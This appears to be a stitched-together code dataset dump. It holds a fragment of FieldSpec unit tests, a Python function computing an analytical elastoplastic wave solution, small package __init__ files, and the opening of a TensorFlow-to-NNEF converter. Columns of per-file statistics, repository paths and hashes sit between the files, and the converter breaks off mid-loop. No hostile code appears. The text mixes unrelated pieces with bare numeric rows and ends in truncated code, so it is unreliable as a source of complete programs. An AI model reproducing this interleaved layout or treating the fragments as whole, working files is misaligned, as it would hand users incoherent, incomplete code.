    assert f.field_ref == "key_foo"
    assert f.field_name == "key_foo"
    assert f.humanized_name == "Foo"
    assert f.alt_name == "key_foo"
    assert not f.subfields
    fs = FieldSet([f])
    assert fs["key_foo"] == f

    f = FieldSpec("key_foo", "Foo", alt_name="key_fuu")
    assert f.field_ref == "key_foo"
    assert f.field_name == "key_foo"
    assert f.humanized_name == "Foo"
    assert f.alt_name == "key_fuu"
    assert not f.subfields
    fs = FieldSet([f])
    assert fs["key_fuu"] == f

    f = FieldSpec("key_foo { bar }")
    assert f.field_ref == "key_foo { bar }"
    assert f.field_name == "key_foo"
    assert f.humanized_name == "Key Foo"
    assert not f.subfields  # not initialized in this case

    f = FieldSpec("key_foo", subfields=FieldSet([
        FieldSpec("bar"),
        FieldSpec("baz", alt_name="bbb"),
    ]))
    assert f.field_ref == "key_foo { bar baz }"
    assert f.field_name == "key_foo"
    assert f.humanized_name == "Key Foo"
    assert f.subfields["bar"].field_ref == "bar"
    assert f.subfields["bbb"].field_ref == "baz"

    f = FieldSpec("key_foo", subfields=FieldSet([
        FieldSpec("bar", subfields=FieldSet([
            FieldSpec("kaz"),
        ])),
    ]))
    assert f.field_ref == "key_foo { bar { kaz } }"
    assert f.field_name == "key_foo"
    assert f.humanized_name == "Key Foo"
    assert f.subfields["bar"].field_ref == "bar { kaz }"
| 30.666667
| 62
| 0.617849
| 249
| 1,748
| 4.128514
| 0.13253
| 0.145914
| 0.18677
| 0.164397
| 0.802529
| 0.738327
| 0.729572
| 0.646887
| 0.559339
| 0.559339
| 0
| 0
| 0.231121
| 1,748
| 56
| 63
| 31.214286
| 0.764881
| 0.016018
| 0
| 0.574468
| 0
| 0
| 0.170547
| 0
| 0
| 0
| 0
| 0
| 0.638298
| 1
| 0.021277
| false
| 0
| 0.021277
| 0
| 0.042553
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7dc102d84c4c429de6ca78e362e8e305e7c6d34e
| 24
|
py
|
Python
|
examples/thresholds/__init__.py
|
sonyccd/simple-cv-examples
|
21be481996dd4643bda16abd9831a741e2904323
|
[
"MIT"
] | null | null | null |
examples/thresholds/__init__.py
|
sonyccd/simple-cv-examples
|
21be481996dd4643bda16abd9831a741e2904323
|
[
"MIT"
] | null | null | null |
examples/thresholds/__init__.py
|
sonyccd/simple-cv-examples
|
21be481996dd4643bda16abd9831a741e2904323
|
[
"MIT"
] | null | null | null |
from .automatic import *
| 24
| 24
| 0.791667
| 3
| 24
| 6.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8173cded67025977a072cd83371af13f995804f7
| 12,301
|
py
|
Python
|
codes/comparison/computeAnalyticalSolutionISO.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | 1
|
2021-06-18T14:52:03.000Z
|
2021-06-18T14:52:03.000Z
|
codes/comparison/computeAnalyticalSolutionISO.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | 1
|
2019-01-07T13:11:11.000Z
|
2019-01-07T13:11:11.000Z
|
codes/comparison/computeAnalyticalSolutionISO.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
import pdb


def computeAnalyticalSolutionISO(x, L, c, t, vd, HEL, E, H, rho):
    # Definition and initialization of arrays and data
    lam = mu = 1.
    Sexact = np.zeros(len(x))
    EPexact = np.zeros(len(x))
    Vexact = np.zeros(len(x))
    HT = E*H/(E+H)  # (2.0*lam*mu+(lam+2.0*mu)*(mu+H))/(3.0*mu+H)
    cp = np.sqrt(HT/rho)

    ## Comment: The analytical solution is defined according to the current time t
    # times (and positions) associated to wave interactions
    t1 = (L/2.0)/c
    t2 = L/(c+cp); x2p = L+(t2/2.0)*(cp-c); x2m = (t2/2.0)*(c-cp)
    t3 = (L-x2p)/c+t2
    t4 = (x2p-x2m)/(2.0*c) + t2
    t5 = L/(4.0*c) + (t3+t4)/2.0; x5p = 3.0*L/4.0 + c*(t3-t4)/2.0
    x5m = L/2.0 - (x5p-L/2.0)
    t6 = (x5p-L/2.0)/c + t5
    t7 = (t5+t6)/2.0 + (x5p-(L/2.0))/(2.0*cp)
    x7p = (x5p+(L/2.0))/2.0 + cp*(t5-t6)/2.0
    x7m = L/2.0 - (x7p-L/2.0)
    t8 = (L/2.0-x7m)/cp + t7
    tint = (L/2.0-x7m)/cp + t8
    t9 = (L-x5p)/c+t5

    # Stress and velocity states
    v1 = HEL/(rho*c)-vd; v1p = -v1; v2 = 0.0
    v3 = 2.0*HEL/(rho*c) - vd; v3p = -v3
    S2 = HEL*(1.0-(cp/c))+rho*cp*vd
    v4 = S2/(2.0*rho*c) + v3/2.0; v4p = -v4
    S4 = (S2-(rho*c*v3))/2.0
    S5 = -2.0*HEL+rho*c*vd
    S7 = -HEL*(1.0+cp/c)+rho*cp*vd-(H*(S2-HEL)*(lam+2.0*mu)/(2.0*mu**2.0))*((lam+2.0*mu)/HT - 1.0)
    v4 = S2/(2.0*rho*c) + v3/2.0; v6 = S4/(rho*c) + v4; v6p = -v6; v5 = 0.0
    v7 = S7/(rho*c)+v6; v7p = (S5-S7)/(rho*c); v7s = -v7p; v7t = -v7
    S8 = S7 + rho*cp*(v7p-v7)/2.0
    v8 = (v7+v7p)/2.0; v8p = -v8
    S9 = S7 - rho*cp*v7p; v9 = (v7p+v7s)/2.0
    S10 = (S8+S9-rho*cp*v8)/2.0
    v10 = (S9-S8)/(2.0*rho*cp) + v8/2.0; v10p = -v10
    S11 = S10 - rho*cp*v10; v11 = 0.0

    # Plastic strain states
    # EP2 = ((S2 - HEL)/(2.0*mu))*(((lam+2.0*mu)/HT)-1.0)
    # EP8 = EP2 + ((S8-S7)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
    # EP9 = EP2 + ((S9-S7)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
    # EP10int = EP9 + ((S10-S9)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
    # EP10ext = EP8 + ((S10-S8)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
    # EP11 = EP10int + ((S11-S10)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
    # pdb.set_trace()

    if (t<t1):
        for i, valx in enumerate(x):
            if ((valx>=(-c*t+(L/2.0))) and (valx<=(-cp*t+(L/2.0)))):
                Sexact[i] = HEL
                Vexact[i] = v1
            elif ((valx>=(cp*t+(L/2.0))) and (valx<=(c*t+(L/2.0)))):
                Sexact[i] = HEL
                Vexact[i] = v1p
            elif ((valx>=(-cp*t+(L/2.0))) and (valx<=(cp*t+(L/2.0)))):
                Sexact[i] = S2
                Vexact[i] = v2
                # EPexact[i] = EP2
            elif (valx<(-c*t+(L/2.0))):
                Vexact[i] = -vd
            elif (valx>(c*t+(L/2.0))):
                Vexact[i] = vd
    elif (t>=t1) and (t<t2):
        for i, valx in enumerate(x):
            if ((valx>(c*(t-t1))) and (valx<(-cp*t+(L/2.0)))):
                Sexact[i] = HEL
                Vexact[i] = v1
            elif ((valx<(L-c*(t-t1))) and (valx>(cp*t+(L/2.0)))):
                Sexact[i] = HEL
                Vexact[i] = v1p
            elif ((valx>=(-cp*t+(L/2.0))) and (valx<=(cp*t+(L/2.0)))):
                Sexact[i] = S2
                Vexact[i] = v2
                # EPexact[i] = EP2
            elif (valx<(c*(t-t1))):
                Vexact[i] = v3
            elif (valx>(L-c*(t-t1))):
                Vexact[i] = v3p
    elif ((t>=t2) and (t<t3)):
        for i, valx in enumerate(x):
            if ((valx>x2m-c*(t-t2)) and (valx<x2m+c*(t-t2))):
                Sexact[i] = S4
                Vexact[i] = v4
            elif ((valx<x2p+c*(t-t2)) and (valx>x2p-c*(t-t2))):
                Sexact[i] = S4
                Vexact[i] = v4p
            elif (valx>x2m+c*(t-t2)) and (valx<x2p-c*(t-t2)):
                Sexact[i] = S2
                Vexact[i] = v2
            elif (valx<x2m-c*(t-t2)):
                Vexact[i] = v3
            elif (valx>x2p+c*(t-t2)):
                Vexact[i] = v3p
            # if ((valx>=x2m) and (valx<=x2p)):
            #     EPexact[i] = EP2
    elif ((t>=t3) and (t<t4)):
        for i, valx in enumerate(x):
            if ((valx>c*(t-t3)) and (valx<x2m+c*(t-t2))):
                Sexact[i] = S4
                Vexact[i] = v4
            elif ((valx<L-c*(t-t3)) and (valx>x2p-c*(t-t2))):
                Sexact[i] = S4
                Vexact[i] = v4p
            elif (valx>x2m+c*(t-t2)) and (valx<x2p-c*(t-t2)):
                Sexact[i] = S2
                Vexact[i] = v2
            elif (valx<c*(t-t3)):
                Vexact[i] = v6
            elif (valx>L-c*(t-t3)):
                Vexact[i] = v6p
            # if ((valx>=x2m) and (valx<=x2p)):
            #     EPexact[i] = EP2
    elif ((t>=t4) and (t<t5)):
        for i, valx in enumerate(x):
            if ((valx>c*(t-t3)) and (valx<L/2.0-c*(t-t4))):
                Sexact[i] = S4
                Vexact[i] = v4
            elif ((valx<L-c*(t-t3)) and (valx>L/2.0+c*(t-t4))):
                Sexact[i] = S4
                Vexact[i] = v4p
            elif (valx>L/2.0-c*(t-t4)) and (valx<L/2.0+c*(t-t4)):
                Sexact[i] = S5
                Vexact[i] = v5
            elif (valx<c*(t-t3)):
                Vexact[i] = v6
            elif (valx>L-c*(t-t3)):
                Vexact[i] = v6p
            # if ((valx>=x2m) and (valx<=x2p)):
            #     EPexact[i] = EP2
    elif ((t>=t5) and (t<t6)):
        for i, valx in enumerate(x):
            if ((valx>x5m-c*(t-t5)) and (valx<x5m-cp*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7
            elif ((valx>x5m+cp*(t-t5)) and (valx<x5m+c*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7p
            elif ((valx>x5p-c*(t-t5)) and (valx<x5p-cp*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7s
            elif ((valx>x5p+cp*(t-t5)) and (valx<x5p+c*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7t
            elif ((valx>x5m-cp*(t-t5)) and (valx<x5m+cp*(t-t5))):
                Sexact[i] = S8
                Vexact[i] = v8
            elif ((valx>x5p-cp*(t-t5)) and (valx<x5p+cp*(t-t5))):
                Sexact[i] = S8
                Vexact[i] = v8p
            elif ((valx>x5m+c*(t-t5)) and (valx<x5p-c*(t-t5))):
                Sexact[i] = S5
                Vexact[i] = v5
            elif (valx<x5m-c*(t-t5)):
                Vexact[i] = v6
            elif (valx>x5p+c*(t-t5)):
                Vexact[i] = v6p
            # if (((valx>x5m-cp*(t-t5)) and (valx<x5m+cp*(t-t5))) \
            #     or ((valx>x5p-cp*(t-t5)) and (valx<x5p+cp*(t-t5)))):
            #     EPexact[i] = EP8
            # elif (((valx>=x2m) and (valx<=x5m-cp*(t-t5))) \
            #     or ((valx>x5m+cp*(t-t5)) and (valx<x5p-cp*(t-t5))) \
            #     or ((valx>x5p+cp*(t-t5)) and (valx<=x2p))):
            #     EPexact[i] = EP2
    elif ((t>=t6) and (t<t7)):
        for i, valx in enumerate(x):
            if ((valx>x5m-c*(t-t5)) and (valx<x5m-cp*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7
            elif ((valx>x5m+cp*(t-t5)) and (valx<L/2.0-cp*(t-t6))):
                Sexact[i] = S7
                Vexact[i] = v7p
            elif ((valx>=L/2.0-cp*(t-t6)) and (valx<=L/2.0+cp*(t-t6))):
                Sexact[i] = S9
                Vexact[i] = v9
            elif ((valx>L/2.0+cp*(t-t6)) and (valx<x5p-cp*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7s
            elif ((valx>x5p+cp*(t-t5)) and (valx<x5p+c*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7t
            elif ((valx>x5m-cp*(t-t5)) and (valx<x5m+cp*(t-t5))):
                Sexact[i] = S8
                Vexact[i] = v8
            elif ((valx>x5p-cp*(t-t5)) and (valx<x5p+cp*(t-t5))):
                Sexact[i] = S8
                Vexact[i] = v8p
            elif (valx<x5m-c*(t-t5)):
                Vexact[i] = v6
            elif (valx>x5p+c*(t-t5)):
                Vexact[i] = v6p
            # if (((valx>x5m-cp*(t-t5)) and (valx<x5m+cp*(t-t5))) \
            #     or ((valx>x5p-cp*(t-t5)) and (valx<x5p+cp*(t-t5)))):
            #     EPexact[i] = EP8
            # elif ((valx>=L/2.0-cp*(t-t6)) and (valx<=L/2.0+cp*(t-t6))):
            #     EPexact[i] = EP9
            # elif (((valx>=x2m) and (valx<=x5m-cp*(t-t5))) \
            #     or ((valx>=x5m+cp*(t-t5)) and (valx<L/2.0-cp*(t-t6))) \
            #     or ((valx>L/2.0+cp*(t-t6)) and (valx<=x5p-cp*(t-t5))) \
            #     or ((valx>x5p+cp*(t-t5)) and (valx<=x2p))):
            #     EPexact[i] = EP2
    elif ((t>=t7) and (t<t8)):
        for i, valx in enumerate(x):
            if ((valx>x5m-c*(t-t5)) and (valx<x5m-cp*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7
            elif ((valx>x5p+cp*(t-t5)) and (valx<x5p+c*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7t
            elif ((valx>=x7m+cp*(t-t7)) and (valx<x7p-cp*(t-t7))):
                Sexact[i] = S9
                Vexact[i] = v9
            elif ( valx>x7m-cp*(t-t7)) and (valx<x7m+cp*(t-t7)):
                Sexact[i] = S10
                Vexact[i] = v10
            elif ( valx>x7p-cp*(t-t7)) and (valx<x7p+cp*(t-t7)):
                Sexact[i] = S10
                Vexact[i] = v10p
            elif ((valx>x5m-cp*(t-t5)) and (valx<x7m-cp*(t-t7))):
                Sexact[i] = S8
                Vexact[i] = v8
            elif ((valx>x7p+cp*(t-t7)) and (valx<x5p+cp*(t-t5))):
                Sexact[i] = S8
                Vexact[i] = v8p
            elif (valx<x5m-c*(t-t5)):
                Vexact[i] = v6
            elif (valx>x5p+c*(t-t5)):
                Vexact[i] = v6p
            # if (((valx>x5m-cp*(t-t5)) and (valx<x7m-cp*(t-t7))) \
            #     or ((valx>x7p+cp*(t-t7)) and (valx<x5p+cp*(t-t5)))):
            #     EPexact[i] = EP8
            # elif (((valx >x2m) and (valx<=x5m-cp*(t-t5))) \
            #     or ((valx>=x5p+cp*(t-t5)) and (valx<x2p))):
            #     EPexact[i] = EP2
            # elif ((valx>x7m+cp*(t-t7)) and (valx<x7p-cp*(t-t7))):
            #     EPexact[i] = EP9
            # elif ((( valx>x7m-cp*(t-t7)) and (valx<=x7m)) \
            #     or (( valx>=x7p) and (valx<x7p+cp*(t-t7)))):
            #     EPexact[i] = EP10ext
            # elif ((( valx>x7m) and (valx<x7m+cp*(t-t7))) \
            #     or (( valx>x7p-cp*(t-t7)) and (valx<=x7p))):
            #     EPexact[i] = EP10int
    elif ((t>=t8) and (t<t9)):
        for i, valx in enumerate(x):
            if ((valx>x5m-c*(t-t5)) and (valx<x5m-cp*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7
            elif ((valx>x5p+cp*(t-t5)) and (valx<x5p+c*(t-t5))):
                Sexact[i] = S7
                Vexact[i] = v7t
            elif ((valx>x5m-cp*(t-t5)) and (valx<x7m-cp*(t-t7))):
                Sexact[i] = S8
                Vexact[i] = v8
            elif ((valx>x7p+cp*(t-t7)) and (valx<x5p+cp*(t-t5))):
                Sexact[i] = S8
                Vexact[i] = v8p
            elif (valx<x5m-c*(t-t5)):
                Vexact[i] = v6
            elif (valx>x5p+c*(t-t5)):
                Vexact[i] = v6p
            elif ( valx>x7m-cp*(t-t7)) and (valx<L/2.0-cp*(t-t8)):
                Sexact[i] = S10
                Vexact[i] = v10
            elif ( valx>L/2.0+cp*(t-t8)) and (valx<x7p+cp*(t-t7)):
                Sexact[i] = S10
                Vexact[i] = v10p
            elif (valx>=L/2.0-cp*(t-t8)) and (valx<=L/2.0+cp*(t-t8)):
                Sexact[i] = S11
                Vexact[i] = v11
            #
            # if (((valx>x5m-cp*(t-t5)) and (valx<x7m-cp*(t-t7))) \
            #     or ((valx>x7p+cp*(t-t7)) and (valx<x5p+cp*(t-t5)))):
            #     EPexact[i] = EP8
            # elif (((valx >x2m) and (valx<=x5m-cp*(t-t5))) \
            #     or ((valx>=x5p+cp*(t-t5)) and (valx<x2p))):
            #     EPexact[i] = EP2
            # elif ((valx>=L/2.0-cp*(t-t8)) and (valx<=L/2.0+cp*(t-t8))):
            #     EPexact[i] = EP11
            # elif (( valx>x7m-cp*(t-t7) and (valx<L/2.0-cp*(t-t8))) \
            #     or (((valx>L/2.0+cp*(t-t8))) and (valx<x7p+cp*(t-t7)))):
            #     EPexact[i] = EP10ext
    return Sexact, EPexact, Vexact
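# Hypothetical invocation (added sketch; every material parameter below is
# illustrative, chosen only to demonstrate the call signature and return values):
#
#     x = np.linspace(0.0, 1.0, 200)  # spatial samples along a bar of length L = 1.0
#     S, EP, V = computeAnalyticalSolutionISO(x, 1.0, 5000.0, 1.0e-5,
#                                             10.0, 2.0e6, 2.0e11, 1.0e10, 7800.0)
#     # S, EP, V are stress, plastic-strain (currently zeros; EP code is commented
#     # out above) and velocity fields sampled at the points in x.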
| 42.564014
| 98
| 0.398342
| 1,934
| 12,301
| 2.533092
| 0.062565
| 0.058788
| 0.04899
| 0.061237
| 0.809145
| 0.786895
| 0.771382
| 0.76138
| 0.713615
| 0.684834
| 0
| 0.098103
| 0.378506
| 12,301
| 288
| 99
| 42.711806
| 0.542708
| 0.215917
| 0
| 0.638009
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004525
| false
| 0
| 0.00905
| 0
| 0.0181
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8183944adf69274649908b7664dd19530dd5bf14
| 87
|
py
|
Python
|
easilyb/commands/__init__.py
|
xaled/easilyb
|
cdb5f738205f700b37e03c50d04061a2d1e730cc
|
[
"MIT"
] | null | null | null |
easilyb/commands/__init__.py
|
xaled/easilyb
|
cdb5f738205f700b37e03c50d04061a2d1e730cc
|
[
"MIT"
] | null | null | null |
easilyb/commands/__init__.py
|
xaled/easilyb
|
cdb5f738205f700b37e03c50d04061a2d1e730cc
|
[
"MIT"
] | null | null | null |
from easilyb.commands._commands import run_command_ex1, run_command, get_command_output
| 87
| 87
| 0.896552
| 13
| 87
| 5.538462
| 0.692308
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012195
| 0.057471
| 87
| 1
| 87
| 87
| 0.865854
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
81852ebe850912964f07845f4199e926dc198ce6
| 157
|
py
|
Python
|
spiketools/utils/__init__.py
|
CamHolman/spiketools
|
56c37a50413a015cfa9c75725cbe7d4ef54968a5
|
[
"Apache-2.0"
] | null | null | null |
spiketools/utils/__init__.py
|
CamHolman/spiketools
|
56c37a50413a015cfa9c75725cbe7d4ef54968a5
|
[
"Apache-2.0"
] | null | null | null |
spiketools/utils/__init__.py
|
CamHolman/spiketools
|
56c37a50413a015cfa9c75725cbe7d4ef54968a5
|
[
"Apache-2.0"
] | null | null | null |
"""Utility functions."""
from .spikes import restrict_range
from .utils import set_random_seed
from .data import get_value_by_time, get_value_by_time_range
| 26.166667
| 60
| 0.828025
| 25
| 157
| 4.8
| 0.64
| 0.133333
| 0.166667
| 0.233333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101911
| 157
| 5
| 61
| 31.4
| 0.851064
| 0.11465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
81b3b5441ee6c54038825039812f063e8ef11bb8
| 170,121
|
py
|
Python
|
au-zone/nnef_converter/tensorflow/tf_converter.py
|
asdor/NNEF-Tools
|
e84c3db29c1bffbd1938d40a10765badc0848606
|
[
"Apache-2.0"
] | null | null | null |
au-zone/nnef_converter/tensorflow/tf_converter.py
|
asdor/NNEF-Tools
|
e84c3db29c1bffbd1938d40a10765badc0848606
|
[
"Apache-2.0"
] | null | null | null |
au-zone/nnef_converter/tensorflow/tf_converter.py
|
asdor/NNEF-Tools
|
e84c3db29c1bffbd1938d40a10765badc0848606
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2018 The Khronos Group Inc.
# Copyright (c) 2018 Au-Zone Technologies Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import math
import logging
import textwrap
import collections
import networkx as nx
import numpy as np
from ..common.importer_exporter import ImporterExporter
from ..common.nnef_data import * #NNEFTensor, TensorDataFile
from ..common.nnef_converter import *
from ..common.nnef_graph import *
from ..common import nnef_node as node
from .core.framework import graph_pb2
from .core.framework import attr_value_pb2
from .core.framework.node_def_pb2 import NodeDef
class TensorflowLogger(object):
    single_line_sep = "---------------------------------------------------------------------------------------------------------------------------------"
    double_line_sep = "===================================================================================================="

    def __init__(self):
        super(TensorflowLogger, self).__init__()
        self.logger = logging.getLogger('nnef_convert')

    def log_tf_node_info(self, tfnode, inputs, attrs):
        title = "Importing Tensorflow Node: "
        preferredWidth = 250
        wrapper = textwrap.TextWrapper(initial_indent=title,
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(self.single_line_sep)
        self.logger.info(wrapper.fill("Name \t%s"%(tfnode.name)))
        wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(wrapper.fill("Op \t%s"%(tfnode.op)))

        unused_input_found = False
        used_input_found = False
        unused_attribute_found = False
        used_attribute_found = False

        if inputs is not None and tfnode.input is not None:
            for cnt, input_item in enumerate(tfnode.input):
                if cnt in inputs.values():
                    if not used_input_found:
                        used_input_found = True
                        self.logger.info(wrapper.fill(""))
                        self.logger.info(wrapper.fill("Used Inputs:"))
                    self.logger.info(wrapper.fill("\t%s"%(input_item)))
            for cnt, input_item in enumerate(tfnode.input):
                if cnt not in inputs.values():
                    if not unused_input_found:
                        unused_input_found = True
                        self.logger.info(wrapper.fill(""))
                        self.logger.info(wrapper.fill("Unused Inputs:"))
                    self.logger.info(wrapper.fill("\t%s"%(input_item)))
        if attrs is not None and tfnode.attr is not None:
            for key, value in tfnode.attr.items():
                if key in attrs:
                    if not used_attribute_found:
                        used_attribute_found = True
                        self.logger.info(wrapper.fill(""))
                        self.logger.info(wrapper.fill("Used Attributes:"))
                    if self.log_level == 'debug':
                        self.logger.debug(wrapper.fill("\t'%s': %s" % (key, value)))
                    else:
                        self.logger.info(wrapper.fill("\t'%s'" % key))
            for key, value in tfnode.attr.items():
                if key not in attrs:
                    if not unused_attribute_found:
                        unused_attribute_found = True
                        self.logger.info(wrapper.fill(""))
                        self.logger.info(wrapper.fill("Unused Attributes:"))
                    if self.log_level == 'debug':
                        self.logger.debug(wrapper.fill("\t'%s': %s" % (key, value)))
                    else:
                        self.logger.info(wrapper.fill("\t'%s'" % key))

    def print_msg_nodeop_nodename(self, title, op, name, level="info"):
        preferred_width = 250
        wrapper = textwrap.TextWrapper(initial_indent=title,
                                       width=preferred_width,
                                       subsequent_indent=' ' * len(title))
        if level == "debug":
            log_fct = self.logger.debug
        elif level == "warning":
            log_fct = self.logger.warning
        elif level == "error":
            log_fct = self.logger.error
        elif level == "critical":
            log_fct = self.logger.critical
        else:
            log_fct = self.logger.info
        log_fct(self.single_line_sep)
        log_fct(wrapper.fill("Name \t%s"%(name)))
        wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
                                       width=preferred_width,
                                       subsequent_indent=' ' * len(title))
        log_fct(wrapper.fill("Op \t%s"%(op)))

    def log_removing_node(self, nnef_node):
        title = "Removing Node From Pool: "
        preferredWidth = 250
        wrapper = textwrap.TextWrapper(initial_indent=title,
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(self.single_line_sep)
        self.logger.info(wrapper.fill("Name \t%s"%(nnef_node.name)))
        wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(wrapper.fill("Op \t%s"%(nnef_node.op)))

    def log_skipping_nodes(self, tfnode):
        self.print_msg_nodeop_nodename("Skipping Op: ", tfnode.op, tfnode.name)
        title = "Skipping Tensorflow Node: "
        preferredWidth = 250
        wrapper = textwrap.TextWrapper(initial_indent=title,
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(self.single_line_sep)
        self.logger.info(wrapper.fill("Name \t%s"%(tfnode.name)))
        wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(wrapper.fill("Op \t%s"%(tfnode.op)))

    def log_unsupported_nodes(self, tfnode):
        title = "Unsupported Tensorflow Node: "
        preferredWidth = 250
        wrapper = textwrap.TextWrapper(initial_indent=title,
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(self.single_line_sep)
        self.logger.info(wrapper.fill("Name \t%s"%(tfnode.name)))
        wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(wrapper.fill("Op \t%s"%(tfnode.op)))

    def log_total_conversions(self):
        title = "Finished Converting Model: "
        preferredWidth = 250
        wrapper = textwrap.TextWrapper(initial_indent=title,
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(self.double_line_sep)
        self.logger.info(wrapper.fill("Total Tensorflow Nodes \t%s"%(str(self.total))))
        wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
                                       width=preferredWidth,
                                       subsequent_indent=' ' * len(title))
        self.logger.info(wrapper.fill("Successfully Converted \t%s"%(str(self.successful))))
        self.logger.info(wrapper.fill("Nodes in Graph \t%s"%(str(len(self.node_pool.keys())-self.removed_nodes))))


def convert_format(convert_list, in_format='nhwc', out_format='nchw'):
    in_format = in_format.lower()
    out_format = out_format.lower()
    in_n_loc = in_format.find('n')
    out_n_loc = out_format.find('n')
    in_c_loc = in_format.find('c')
    out_c_loc = out_format.find('c')

    n = convert_list[in_n_loc]
    c = convert_list[in_c_loc]
    sizes = []
    for i in range(len(convert_list)):
        if(i != in_n_loc and i != in_c_loc):
            sizes.append(convert_list[i])

    out_list = [None]*len(convert_list)
    out_list[out_n_loc] = n
    out_list[out_c_loc] = c
    j = 0
    for i in range(len(out_list)):
        if(i != out_n_loc and i != out_c_loc):
            out_list[i] = sizes[j]
            j += 1
    return out_list
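# Example (added, illustrative):
#     convert_format([1, 224, 224, 3], 'nhwc', 'nchw')  ->  [1, 3, 224, 224]
# 'n' and 'c' are repositioned for the target layout; the remaining spatial
# dimensions keep their relative order.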
class TensorflowImporter(TensorflowLogger, ImporterExporter):
    def __init__(self, input_model, input_nodes, output_nodes, log_level='info'):
        super(TensorflowImporter, self).__init__()
        self.node_pool = collections.OrderedDict()
        self.input_model = input_model
        self.log_level = log_level
        self.input_nodes = {}
        self.output_nodes = {}
        self.name_convs = {}
        self.start_format = None
        self.start_length = 0
        self.successful = 0
        self.total = 0
        self.removed_nodes = 0
        self.graph = super(TensorflowImporter, self).openProtobuf(self.input_model, graph_pb2.GraphDef())

        i = 1
        if input_nodes is not None:
            for in_node_str in input_nodes.split(','):
                if len(input_nodes.split(',')) == 1:
